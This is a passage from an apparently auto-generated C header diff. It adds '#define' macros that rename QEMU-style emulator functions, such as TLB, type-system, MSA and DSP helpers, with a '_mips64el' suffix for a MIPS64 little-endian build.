tlbimvaa_write_mips64el +#define tlbimva_is_write tlbimva_is_write_mips64el +#define tlbimva_write tlbimva_write_mips64el +#define tlb_is_dirty_ram tlb_is_dirty_ram_mips64el +#define tlb_protect_code tlb_protect_code_mips64el +#define tlb_reset_dirty_range tlb_reset_dirty_range_mips64el +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_mips64el +#define tlb_set_dirty tlb_set_dirty_mips64el +#define tlb_set_dirty1 tlb_set_dirty1_mips64el +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_mips64el +#define tlb_vaddr_to_host tlb_vaddr_to_host_mips64el +#define token_get_type token_get_type_mips64el +#define token_get_value token_get_value_mips64el +#define token_is_escape token_is_escape_mips64el +#define token_is_keyword token_is_keyword_mips64el +#define token_is_operator token_is_operator_mips64el +#define tokens_append_from_iter tokens_append_from_iter_mips64el +#define to_qiv to_qiv_mips64el +#define to_qov to_qov_mips64el +#define tosa_init tosa_init_mips64el +#define tosa_machine_init tosa_machine_init_mips64el +#define tswap32 tswap32_mips64el +#define tswap64 tswap64_mips64el +#define type_class_get_size type_class_get_size_mips64el +#define type_get_by_name type_get_by_name_mips64el +#define type_get_parent type_get_parent_mips64el +#define type_has_parent type_has_parent_mips64el +#define type_initialize type_initialize_mips64el +#define type_initialize_interface type_initialize_interface_mips64el +#define type_is_ancestor type_is_ancestor_mips64el +#define type_new type_new_mips64el +#define type_object_get_size type_object_get_size_mips64el +#define type_register_internal type_register_internal_mips64el +#define type_table_add type_table_add_mips64el +#define type_table_get type_table_get_mips64el +#define type_table_lookup type_table_lookup_mips64el +#define uint16_to_float32 uint16_to_float32_mips64el +#define uint16_to_float64 uint16_to_float64_mips64el +#define uint32_to_float32 uint32_to_float32_mips64el +#define uint32_to_float64 
uint32_to_float64_mips64el +#define uint64_to_float128 uint64_to_float128_mips64el +#define uint64_to_float32 uint64_to_float32_mips64el +#define uint64_to_float64 uint64_to_float64_mips64el +#define unassigned_io_ops unassigned_io_ops_mips64el +#define unassigned_io_read unassigned_io_read_mips64el +#define unassigned_io_write unassigned_io_write_mips64el +#define unassigned_mem_accepts unassigned_mem_accepts_mips64el +#define unassigned_mem_ops unassigned_mem_ops_mips64el +#define unassigned_mem_read unassigned_mem_read_mips64el +#define unassigned_mem_write unassigned_mem_write_mips64el +#define update_spsel update_spsel_mips64el +#define v6_cp_reginfo v6_cp_reginfo_mips64el +#define v6k_cp_reginfo v6k_cp_reginfo_mips64el +#define v7_cp_reginfo v7_cp_reginfo_mips64el +#define v7mp_cp_reginfo v7mp_cp_reginfo_mips64el +#define v7m_pop v7m_pop_mips64el +#define v7m_push v7m_push_mips64el +#define v8_cp_reginfo v8_cp_reginfo_mips64el +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_mips64el +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_mips64el +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_mips64el +#define vapa_cp_reginfo vapa_cp_reginfo_mips64el +#define vbar_write vbar_write_mips64el +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_mips64el +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_mips64el +#define vfp_get_fpcr vfp_get_fpcr_mips64el +#define vfp_get_fpscr vfp_get_fpscr_mips64el +#define vfp_get_fpsr vfp_get_fpsr_mips64el +#define vfp_reg_offset vfp_reg_offset_mips64el +#define vfp_set_fpcr vfp_set_fpcr_mips64el +#define vfp_set_fpscr vfp_set_fpscr_mips64el +#define vfp_set_fpsr vfp_set_fpsr_mips64el +#define visit_end_implicit_struct visit_end_implicit_struct_mips64el +#define visit_end_list visit_end_list_mips64el +#define visit_end_struct visit_end_struct_mips64el +#define visit_end_union visit_end_union_mips64el +#define visit_get_next_type visit_get_next_type_mips64el +#define visit_next_list visit_next_list_mips64el +#define 
visit_optional visit_optional_mips64el +#define visit_start_implicit_struct visit_start_implicit_struct_mips64el +#define visit_start_list visit_start_list_mips64el +#define visit_start_struct visit_start_struct_mips64el +#define visit_start_union visit_start_union_mips64el +#define vmsa_cp_reginfo vmsa_cp_reginfo_mips64el +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_mips64el +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_mips64el +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_mips64el +#define vmsa_ttbcr_write vmsa_ttbcr_write_mips64el +#define vmsa_ttbr_write vmsa_ttbr_write_mips64el +#define write_cpustate_to_list write_cpustate_to_list_mips64el +#define write_list_to_cpustate write_list_to_cpustate_mips64el +#define write_raw_cp_reg write_raw_cp_reg_mips64el +#define X86CPURegister32_lookup X86CPURegister32_lookup_mips64el +#define x86_op_defs x86_op_defs_mips64el +#define xpsr_read xpsr_read_mips64el +#define xpsr_write xpsr_write_mips64el +#define xscale_cpar_write xscale_cpar_write_mips64el +#define xscale_cp_reginfo xscale_cp_reginfo_mips64el +#define cpu_mips_exec cpu_mips_exec_mips64el +#define cpu_mips_get_random cpu_mips_get_random_mips64el +#define cpu_mips_get_count cpu_mips_get_count_mips64el +#define cpu_mips_store_count cpu_mips_store_count_mips64el +#define cpu_mips_store_compare cpu_mips_store_compare_mips64el +#define cpu_mips_start_count cpu_mips_start_count_mips64el +#define cpu_mips_stop_count cpu_mips_stop_count_mips64el +#define mips_machine_init mips_machine_init_mips64el +#define cpu_mips_kseg0_to_phys cpu_mips_kseg0_to_phys_mips64el +#define cpu_mips_phys_to_kseg0 cpu_mips_phys_to_kseg0_mips64el +#define cpu_mips_kvm_um_phys_to_kseg0 cpu_mips_kvm_um_phys_to_kseg0_mips64el +#define mips_cpu_register_types mips_cpu_register_types_mips64el +#define cpu_mips_init cpu_mips_init_mips64el +#define cpu_state_reset cpu_state_reset_mips64el +#define helper_msa_andi_b helper_msa_andi_b_mips64el +#define helper_msa_ori_b helper_msa_ori_b_mips64el 
+#define helper_msa_nori_b helper_msa_nori_b_mips64el +#define helper_msa_xori_b helper_msa_xori_b_mips64el +#define helper_msa_bmnzi_b helper_msa_bmnzi_b_mips64el +#define helper_msa_bmzi_b helper_msa_bmzi_b_mips64el +#define helper_msa_bseli_b helper_msa_bseli_b_mips64el +#define helper_msa_shf_df helper_msa_shf_df_mips64el +#define helper_msa_and_v helper_msa_and_v_mips64el +#define helper_msa_or_v helper_msa_or_v_mips64el +#define helper_msa_nor_v helper_msa_nor_v_mips64el +#define helper_msa_xor_v helper_msa_xor_v_mips64el +#define helper_msa_bmnz_v helper_msa_bmnz_v_mips64el +#define helper_msa_bmz_v helper_msa_bmz_v_mips64el +#define helper_msa_bsel_v helper_msa_bsel_v_mips64el +#define helper_msa_addvi_df helper_msa_addvi_df_mips64el +#define helper_msa_subvi_df helper_msa_subvi_df_mips64el +#define helper_msa_ceqi_df helper_msa_ceqi_df_mips64el +#define helper_msa_clei_s_df helper_msa_clei_s_df_mips64el +#define helper_msa_clei_u_df helper_msa_clei_u_df_mips64el +#define helper_msa_clti_s_df helper_msa_clti_s_df_mips64el +#define helper_msa_clti_u_df helper_msa_clti_u_df_mips64el +#define helper_msa_maxi_s_df helper_msa_maxi_s_df_mips64el +#define helper_msa_maxi_u_df helper_msa_maxi_u_df_mips64el +#define helper_msa_mini_s_df helper_msa_mini_s_df_mips64el +#define helper_msa_mini_u_df helper_msa_mini_u_df_mips64el +#define helper_msa_ldi_df helper_msa_ldi_df_mips64el +#define helper_msa_slli_df helper_msa_slli_df_mips64el +#define helper_msa_srai_df helper_msa_srai_df_mips64el +#define helper_msa_srli_df helper_msa_srli_df_mips64el +#define helper_msa_bclri_df helper_msa_bclri_df_mips64el +#define helper_msa_bseti_df helper_msa_bseti_df_mips64el +#define helper_msa_bnegi_df helper_msa_bnegi_df_mips64el +#define helper_msa_sat_s_df helper_msa_sat_s_df_mips64el +#define helper_msa_sat_u_df helper_msa_sat_u_df_mips64el +#define helper_msa_srari_df helper_msa_srari_df_mips64el +#define helper_msa_srlri_df helper_msa_srlri_df_mips64el +#define 
helper_msa_binsli_df helper_msa_binsli_df_mips64el +#define helper_msa_binsri_df helper_msa_binsri_df_mips64el +#define helper_msa_sll_df helper_msa_sll_df_mips64el +#define helper_msa_sra_df helper_msa_sra_df_mips64el +#define helper_msa_srl_df helper_msa_srl_df_mips64el +#define helper_msa_bclr_df helper_msa_bclr_df_mips64el +#define helper_msa_bset_df helper_msa_bset_df_mips64el +#define helper_msa_bneg_df helper_msa_bneg_df_mips64el +#define helper_msa_addv_df helper_msa_addv_df_mips64el +#define helper_msa_subv_df helper_msa_subv_df_mips64el +#define helper_msa_max_s_df helper_msa_max_s_df_mips64el +#define helper_msa_max_u_df helper_msa_max_u_df_mips64el +#define helper_msa_min_s_df helper_msa_min_s_df_mips64el +#define helper_msa_min_u_df helper_msa_min_u_df_mips64el +#define helper_msa_max_a_df helper_msa_max_a_df_mips64el +#define helper_msa_min_a_df helper_msa_min_a_df_mips64el +#define helper_msa_ceq_df helper_msa_ceq_df_mips64el +#define helper_msa_clt_s_df helper_msa_clt_s_df_mips64el +#define helper_msa_clt_u_df helper_msa_clt_u_df_mips64el +#define helper_msa_cle_s_df helper_msa_cle_s_df_mips64el +#define helper_msa_cle_u_df helper_msa_cle_u_df_mips64el +#define helper_msa_add_a_df helper_msa_add_a_df_mips64el +#define helper_msa_adds_a_df helper_msa_adds_a_df_mips64el +#define helper_msa_adds_s_df helper_msa_adds_s_df_mips64el +#define helper_msa_adds_u_df helper_msa_adds_u_df_mips64el +#define helper_msa_ave_s_df helper_msa_ave_s_df_mips64el +#define helper_msa_ave_u_df helper_msa_ave_u_df_mips64el +#define helper_msa_aver_s_df helper_msa_aver_s_df_mips64el +#define helper_msa_aver_u_df helper_msa_aver_u_df_mips64el +#define helper_msa_subs_s_df helper_msa_subs_s_df_mips64el +#define helper_msa_subs_u_df helper_msa_subs_u_df_mips64el +#define helper_msa_subsus_u_df helper_msa_subsus_u_df_mips64el +#define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mips64el +#define helper_msa_asub_s_df helper_msa_asub_s_df_mips64el +#define helper_msa_asub_u_df 
helper_msa_asub_u_df_mips64el +#define helper_msa_mulv_df helper_msa_mulv_df_mips64el +#define helper_msa_div_s_df helper_msa_div_s_df_mips64el +#define helper_msa_div_u_df helper_msa_div_u_df_mips64el +#define helper_msa_mod_s_df helper_msa_mod_s_df_mips64el +#define helper_msa_mod_u_df helper_msa_mod_u_df_mips64el +#define helper_msa_dotp_s_df helper_msa_dotp_s_df_mips64el +#define helper_msa_dotp_u_df helper_msa_dotp_u_df_mips64el +#define helper_msa_srar_df helper_msa_srar_df_mips64el +#define helper_msa_srlr_df helper_msa_srlr_df_mips64el +#define helper_msa_hadd_s_df helper_msa_hadd_s_df_mips64el +#define helper_msa_hadd_u_df helper_msa_hadd_u_df_mips64el +#define helper_msa_hsub_s_df helper_msa_hsub_s_df_mips64el +#define helper_msa_hsub_u_df helper_msa_hsub_u_df_mips64el +#define helper_msa_mul_q_df helper_msa_mul_q_df_mips64el +#define helper_msa_mulr_q_df helper_msa_mulr_q_df_mips64el +#define helper_msa_sld_df helper_msa_sld_df_mips64el +#define helper_msa_maddv_df helper_msa_maddv_df_mips64el +#define helper_msa_msubv_df helper_msa_msubv_df_mips64el +#define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mips64el +#define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mips64el +#define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mips64el +#define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mips64el +#define helper_msa_binsl_df helper_msa_binsl_df_mips64el +#define helper_msa_binsr_df helper_msa_binsr_df_mips64el +#define helper_msa_madd_q_df helper_msa_madd_q_df_mips64el +#define helper_msa_msub_q_df helper_msa_msub_q_df_mips64el +#define helper_msa_maddr_q_df helper_msa_maddr_q_df_mips64el +#define helper_msa_msubr_q_df helper_msa_msubr_q_df_mips64el +#define helper_msa_splat_df helper_msa_splat_df_mips64el +#define helper_msa_pckev_df helper_msa_pckev_df_mips64el +#define helper_msa_pckod_df helper_msa_pckod_df_mips64el +#define helper_msa_ilvl_df helper_msa_ilvl_df_mips64el +#define helper_msa_ilvr_df helper_msa_ilvr_df_mips64el +#define 
helper_msa_ilvev_df helper_msa_ilvev_df_mips64el +#define helper_msa_ilvod_df helper_msa_ilvod_df_mips64el +#define helper_msa_vshf_df helper_msa_vshf_df_mips64el +#define helper_msa_sldi_df helper_msa_sldi_df_mips64el +#define helper_msa_splati_df helper_msa_splati_df_mips64el +#define helper_msa_copy_s_df helper_msa_copy_s_df_mips64el +#define helper_msa_copy_u_df helper_msa_copy_u_df_mips64el +#define helper_msa_insert_df helper_msa_insert_df_mips64el +#define helper_msa_insve_df helper_msa_insve_df_mips64el +#define helper_msa_ctcmsa helper_msa_ctcmsa_mips64el +#define helper_msa_cfcmsa helper_msa_cfcmsa_mips64el +#define helper_msa_move_v helper_msa_move_v_mips64el +#define helper_msa_fill_df helper_msa_fill_df_mips64el +#define helper_msa_nlzc_df helper_msa_nlzc_df_mips64el +#define helper_msa_nloc_df helper_msa_nloc_df_mips64el +#define helper_msa_pcnt_df helper_msa_pcnt_df_mips64el +#define helper_msa_fcaf_df helper_msa_fcaf_df_mips64el +#define helper_msa_fcun_df helper_msa_fcun_df_mips64el +#define helper_msa_fceq_df helper_msa_fceq_df_mips64el +#define helper_msa_fcueq_df helper_msa_fcueq_df_mips64el +#define helper_msa_fclt_df helper_msa_fclt_df_mips64el +#define helper_msa_fcult_df helper_msa_fcult_df_mips64el +#define helper_msa_fcle_df helper_msa_fcle_df_mips64el +#define helper_msa_fcule_df helper_msa_fcule_df_mips64el +#define helper_msa_fsaf_df helper_msa_fsaf_df_mips64el +#define helper_msa_fsun_df helper_msa_fsun_df_mips64el +#define helper_msa_fseq_df helper_msa_fseq_df_mips64el +#define helper_msa_fsueq_df helper_msa_fsueq_df_mips64el +#define helper_msa_fslt_df helper_msa_fslt_df_mips64el +#define helper_msa_fsult_df helper_msa_fsult_df_mips64el +#define helper_msa_fsle_df helper_msa_fsle_df_mips64el +#define helper_msa_fsule_df helper_msa_fsule_df_mips64el +#define helper_msa_fcor_df helper_msa_fcor_df_mips64el +#define helper_msa_fcune_df helper_msa_fcune_df_mips64el +#define helper_msa_fcne_df helper_msa_fcne_df_mips64el +#define 
helper_msa_fsor_df helper_msa_fsor_df_mips64el +#define helper_msa_fsune_df helper_msa_fsune_df_mips64el +#define helper_msa_fsne_df helper_msa_fsne_df_mips64el +#define helper_msa_fadd_df helper_msa_fadd_df_mips64el +#define helper_msa_fsub_df helper_msa_fsub_df_mips64el +#define helper_msa_fmul_df helper_msa_fmul_df_mips64el +#define helper_msa_fdiv_df helper_msa_fdiv_df_mips64el +#define helper_msa_fmadd_df helper_msa_fmadd_df_mips64el +#define helper_msa_fmsub_df helper_msa_fmsub_df_mips64el +#define helper_msa_fexp2_df helper_msa_fexp2_df_mips64el +#define helper_msa_fexdo_df helper_msa_fexdo_df_mips64el +#define helper_msa_ftq_df helper_msa_ftq_df_mips64el +#define helper_msa_fmin_df helper_msa_fmin_df_mips64el +#define helper_msa_fmin_a_df helper_msa_fmin_a_df_mips64el +#define helper_msa_fmax_df helper_msa_fmax_df_mips64el +#define helper_msa_fmax_a_df helper_msa_fmax_a_df_mips64el +#define helper_msa_fclass_df helper_msa_fclass_df_mips64el +#define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mips64el +#define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mips64el +#define helper_msa_fsqrt_df helper_msa_fsqrt_df_mips64el +#define helper_msa_frsqrt_df helper_msa_frsqrt_df_mips64el +#define helper_msa_frcp_df helper_msa_frcp_df_mips64el +#define helper_msa_frint_df helper_msa_frint_df_mips64el +#define helper_msa_flog2_df helper_msa_flog2_df_mips64el +#define helper_msa_fexupl_df helper_msa_fexupl_df_mips64el +#define helper_msa_fexupr_df helper_msa_fexupr_df_mips64el +#define helper_msa_ffql_df helper_msa_ffql_df_mips64el +#define helper_msa_ffqr_df helper_msa_ffqr_df_mips64el +#define helper_msa_ftint_s_df helper_msa_ftint_s_df_mips64el +#define helper_msa_ftint_u_df helper_msa_ftint_u_df_mips64el +#define helper_msa_ffint_s_df helper_msa_ffint_s_df_mips64el +#define helper_msa_ffint_u_df helper_msa_ffint_u_df_mips64el +#define helper_paddsb helper_paddsb_mips64el +#define helper_paddusb helper_paddusb_mips64el +#define helper_paddsh 
helper_paddsh_mips64el +#define helper_paddush helper_paddush_mips64el +#define helper_paddb helper_paddb_mips64el +#define helper_paddh helper_paddh_mips64el +#define helper_paddw helper_paddw_mips64el +#define helper_psubsb helper_psubsb_mips64el +#define helper_psubusb helper_psubusb_mips64el +#define helper_psubsh helper_psubsh_mips64el +#define helper_psubush helper_psubush_mips64el +#define helper_psubb helper_psubb_mips64el +#define helper_psubh helper_psubh_mips64el +#define helper_psubw helper_psubw_mips64el +#define helper_pshufh helper_pshufh_mips64el +#define helper_packsswh helper_packsswh_mips64el +#define helper_packsshb helper_packsshb_mips64el +#define helper_packushb helper_packushb_mips64el +#define helper_punpcklwd helper_punpcklwd_mips64el +#define helper_punpckhwd helper_punpckhwd_mips64el +#define helper_punpcklhw helper_punpcklhw_mips64el +#define helper_punpckhhw helper_punpckhhw_mips64el +#define helper_punpcklbh helper_punpcklbh_mips64el +#define helper_punpckhbh helper_punpckhbh_mips64el +#define helper_pavgh helper_pavgh_mips64el +#define helper_pavgb helper_pavgb_mips64el +#define helper_pmaxsh helper_pmaxsh_mips64el +#define helper_pminsh helper_pminsh_mips64el +#define helper_pmaxub helper_pmaxub_mips64el +#define helper_pminub helper_pminub_mips64el +#define helper_pcmpeqw helper_pcmpeqw_mips64el +#define helper_pcmpgtw helper_pcmpgtw_mips64el +#define helper_pcmpeqh helper_pcmpeqh_mips64el +#define helper_pcmpgth helper_pcmpgth_mips64el +#define helper_pcmpeqb helper_pcmpeqb_mips64el +#define helper_pcmpgtb helper_pcmpgtb_mips64el +#define helper_psllw helper_psllw_mips64el +#define helper_psrlw helper_psrlw_mips64el +#define helper_psraw helper_psraw_mips64el +#define helper_psllh helper_psllh_mips64el +#define helper_psrlh helper_psrlh_mips64el +#define helper_psrah helper_psrah_mips64el +#define helper_pmullh helper_pmullh_mips64el +#define helper_pmulhh helper_pmulhh_mips64el +#define helper_pmulhuh helper_pmulhuh_mips64el 
+#define helper_pmaddhw helper_pmaddhw_mips64el +#define helper_pasubub helper_pasubub_mips64el +#define helper_biadd helper_biadd_mips64el +#define helper_pmovmskb helper_pmovmskb_mips64el +#define helper_absq_s_ph helper_absq_s_ph_mips64el +#define helper_absq_s_qb helper_absq_s_qb_mips64el +#define helper_absq_s_w helper_absq_s_w_mips64el +#define helper_addqh_ph helper_addqh_ph_mips64el +#define helper_addqh_r_ph helper_addqh_r_ph_mips64el +#define helper_addqh_r_w helper_addqh_r_w_mips64el +#define helper_addqh_w helper_addqh_w_mips64el +#define helper_adduh_qb helper_adduh_qb_mips64el +#define helper_adduh_r_qb helper_adduh_r_qb_mips64el +#define helper_subqh_ph helper_subqh_ph_mips64el +#define helper_subqh_r_ph helper_subqh_r_ph_mips64el +#define helper_subqh_r_w helper_subqh_r_w_mips64el +#define helper_subqh_w helper_subqh_w_mips64el +#define helper_addq_ph helper_addq_ph_mips64el +#define helper_addq_s_ph helper_addq_s_ph_mips64el +#define helper_addq_s_w helper_addq_s_w_mips64el +#define helper_addu_ph helper_addu_ph_mips64el +#define helper_addu_qb helper_addu_qb_mips64el +#define helper_addu_s_ph helper_addu_s_ph_mips64el +#define helper_addu_s_qb helper_addu_s_qb_mips64el +#define helper_subq_ph helper_subq_ph_mips64el +#define helper_subq_s_ph helper_subq_s_ph_mips64el +#define helper_subq_s_w helper_subq_s_w_mips64el +#define helper_subu_ph helper_subu_ph_mips64el +#define helper_subu_qb helper_subu_qb_mips64el +#define helper_subu_s_ph helper_subu_s_ph_mips64el +#define helper_subu_s_qb helper_subu_s_qb_mips64el +#define helper_subuh_qb helper_subuh_qb_mips64el +#define helper_subuh_r_qb helper_subuh_r_qb_mips64el +#define helper_addsc helper_addsc_mips64el +#define helper_addwc helper_addwc_mips64el +#define helper_modsub helper_modsub_mips64el +#define helper_raddu_w_qb helper_raddu_w_qb_mips64el +#define helper_precr_qb_ph helper_precr_qb_ph_mips64el +#define helper_precrq_qb_ph helper_precrq_qb_ph_mips64el +#define helper_precr_sra_ph_w 
helper_precr_sra_ph_w_mips64el +#define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mips64el +#define helper_precrq_ph_w helper_precrq_ph_w_mips64el +#define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mips64el +#define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mips64el +#define helper_precequ_ph_qbl helper_precequ_ph_qbl_mips64el +#define helper_precequ_ph_qbr helper_precequ_ph_qbr_mips64el +#define helper_precequ_ph_qbla helper_precequ_ph_qbla_mips64el +#define helper_precequ_ph_qbra helper_precequ_ph_qbra_mips64el +#define helper_preceu_ph_qbl helper_preceu_ph_qbl_mips64el +#define helper_preceu_ph_qbr helper_preceu_ph_qbr_mips64el +#define helper_preceu_ph_qbla helper_preceu_ph_qbla_mips64el +#define helper_preceu_ph_qbra helper_preceu_ph_qbra_mips64el +#define helper_shll_qb helper_shll_qb_mips64el +#define helper_shrl_qb helper_shrl_qb_mips64el +#define helper_shra_qb helper_shra_qb_mips64el +#define helper_shra_r_qb helper_shra_r_qb_mips64el +#define helper_shll_ph helper_shll_ph_mips64el +#define helper_shll_s_ph helper_shll_s_ph_mips64el +#define helper_shll_s_w helper_shll_s_w_mips64el +#define helper_shra_r_w helper_shra_r_w_mips64el +#define helper_shrl_ph helper_shrl_ph_mips64el +#define helper_shra_ph helper_shra_ph_mips64el +#define helper_shra_r_ph helper_shra_r_ph_mips64el +#define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mips64el +#define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mips64el +#define helper_mulq_rs_ph helper_mulq_rs_ph_mips64el +#define helper_mul_ph helper_mul_ph_mips64el +#define helper_mul_s_ph helper_mul_s_ph_mips64el +#define helper_mulq_s_ph helper_mulq_s_ph_mips64el +#define helper_muleq_s_w_phl helper_muleq_s_w_phl_mips64el +#define helper_muleq_s_w_phr helper_muleq_s_w_phr_mips64el +#define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mips64el +#define helper_mulsa_w_ph helper_mulsa_w_ph_mips64el +#define helper_dpau_h_qbl helper_dpau_h_qbl_mips64el +#define helper_dpau_h_qbr helper_dpau_h_qbr_mips64el +#define 
helper_dpsu_h_qbl helper_dpsu_h_qbl_mips64el +#define helper_dpsu_h_qbr helper_dpsu_h_qbr_mips64el +#define helper_dpa_w_ph helper_dpa_w_ph_mips64el +#define helper_dpax_w_ph helper_dpax_w_ph_mips64el +#define helper_dps_w_ph helper_dps_w_ph_mips64el +#define helper_dpsx_w_ph helper_dpsx_w_ph_mips64el +#define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mips64el +#define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mips64el +#define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mips64el +#define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mips64el +#define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mips64el +#define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mips64el +#define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mips64el +#define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mips64el +#define helper_maq_s_w_phl helper_maq_s_w_phl_mips64el +#define helper_maq_s_w_phr helper_maq_s_w_phr_mips64el +#define helper_maq_sa_w_phl helper_maq_sa_w_phl_mips64el +#define helper_maq_sa_w_phr helper_maq_sa_w_phr_mips64el +#define helper_mulq_s_w helper_mulq_s_w_mips64el +#define helper_mulq_rs_w helper_mulq_rs_w_mips64el +#define helper_bitrev helper_bitrev_mips64el +#define helper_insv helper_insv_mips64el +#define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mips64el +#define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mips64el +#define helper_cmpgu_le_qb helper_cmpgu_le_qb_mips64el +#define helper_cmpu_eq_qb helper_cmpu_eq_qb_mips64el +#define helper_cmpu_lt_qb helper_cmpu_lt_qb_mips64el +#define helper_cmpu_le_qb helper_cmpu_le_qb_mips64el +#define helper_cmp_eq_ph helper_cmp_eq_ph_mips64el +#define helper_cmp_lt_ph helper_cmp_lt_ph_mips64el +#define helper_cmp_le_ph helper_cmp_le_ph_mips64el +#define helper_pick_qb helper_pick_qb_mips64el +#define helper_pick_ph helper_pick_ph_mips64el +#define helper_packrl_ph helper_packrl_ph_mips64el +#define helper_extr_w helper_extr_w_mips64el +#define helper_extr_r_w helper_extr_r_w_mips64el +#define helper_extr_rs_w helper_extr_rs_w_mips64el +#define helper_extr_s_h 
helper_extr_s_h_mips64el +#define helper_extp helper_extp_mips64el +#define helper_extpdp helper_extpdp_mips64el +#define helper_shilo helper_shilo_mips64el +#define helper_mthlip helper_mthlip_mips64el +#define cpu_wrdsp cpu_wrdsp_mips64el +#define helper_wrdsp helper_wrdsp_mips64el +#define cpu_rddsp cpu_rddsp_mips64el +#define helper_rddsp helper_rddsp_mips64el +#define helper_raise_exception_err helper_raise_exception_err_mips64el +#define helper_clo helper_clo_mips64el +#define helper_clz helper_clz_mips64el +#define helper_muls helper_muls_mips64el +#define helper_mulsu helper_mulsu_mips64el +#define helper_macc helper_macc_mips64el +#define helper_macchi helper_macchi_mips64el +#define helper_maccu helper_maccu_mips64el +#define helper_macchiu helper_macchiu_mips64el +#define helper_msac helper_msac_mips64el +#define helper_msachi helper_msachi_mips64el +#define helper_msacu helper_msacu_mips64el +#define helper_msachiu helper_msachiu_mips64el +#define helper_mulhi helper_mulhi_mips64el +#define helper_mulhiu helper_mulhiu_mips64el +#define helper_mulshi helper_mulshi_mips64el +#define helper_mulshiu helper_mulshiu_mips64el +#define helper_bitswap helper_bitswap_mips64el +#define helper_ll helper_ll_mips64el +#define helper_sc helper_sc_mips64el +#define helper_swl helper_swl_mips64el +#define helper_swr helper_swr_mips64el +#define helper_lwm helper_lwm_mips64el +#define helper_swm helper_swm_mips64el +#define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mips64el +#define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mips64el +#define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mips64el +#define helper_mfc0_random helper_mfc0_random_mips64el +#define helper_mfc0_tcstatus helper_mfc0_tcstatus_mips64el +#define helper_mftc0_tcstatus helper_mftc0_tcstatus_mips64el +#define helper_mfc0_tcbind helper_mfc0_tcbind_mips64el +#define helper_mftc0_tcbind helper_mftc0_tcbind_mips64el +#define helper_mfc0_tcrestart helper_mfc0_tcrestart_mips64el +#define 
helper_mftc0_tcrestart helper_mftc0_tcrestart_mips64el +#define helper_mfc0_tchalt helper_mfc0_tchalt_mips64el +#define helper_mftc0_tchalt helper_mftc0_tchalt_mips64el +#define helper_mfc0_tccontext helper_mfc0_tccontext_mips64el +#define helper_mftc0_tccontext helper_mftc0_tccontext_mips64el +#define helper_mfc0_tcschedule helper_mfc0_tcschedule_mips64el +#define helper_mftc0_tcschedule helper_mftc0_tcschedule_mips64el +#define helper_mfc0_tcschefback helper_mfc0_tcschefback_mips64el +#define helper_mftc0_tcschefback helper_mftc0_tcschefback_mips64el +#define helper_mfc0_count helper_mfc0_count_mips64el +#define helper_mftc0_entryhi helper_mftc0_entryhi_mips64el +#define helper_mftc0_cause helper_mftc0_cause_mips64el +#define helper_mftc0_status helper_mftc0_status_mips64el +#define helper_mfc0_lladdr helper_mfc0_lladdr_mips64el +#define helper_mfc0_watchlo helper_mfc0_watchlo_mips64el +#define helper_mfc0_watchhi helper_mfc0_watchhi_mips64el +#define helper_mfc0_debug helper_mfc0_debug_mips64el +#define helper_mftc0_debug helper_mftc0_debug_mips64el +#define helper_mtc0_index helper_mtc0_index_mips64el +#define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mips64el +#define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mips64el +#define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mips64el +#define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mips64el +#define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mips64el +#define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mips64el +#define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mips64el +#define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mips64el +#define helper_mtc0_yqmask helper_mtc0_yqmask_mips64el +#define helper_mtc0_vpeopt helper_mtc0_vpeopt_mips64el +#define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mips64el +#define helper_mtc0_tcstatus helper_mtc0_tcstatus_mips64el +#define helper_mttc0_tcstatus helper_mttc0_tcstatus_mips64el +#define helper_mtc0_tcbind helper_mtc0_tcbind_mips64el +#define 
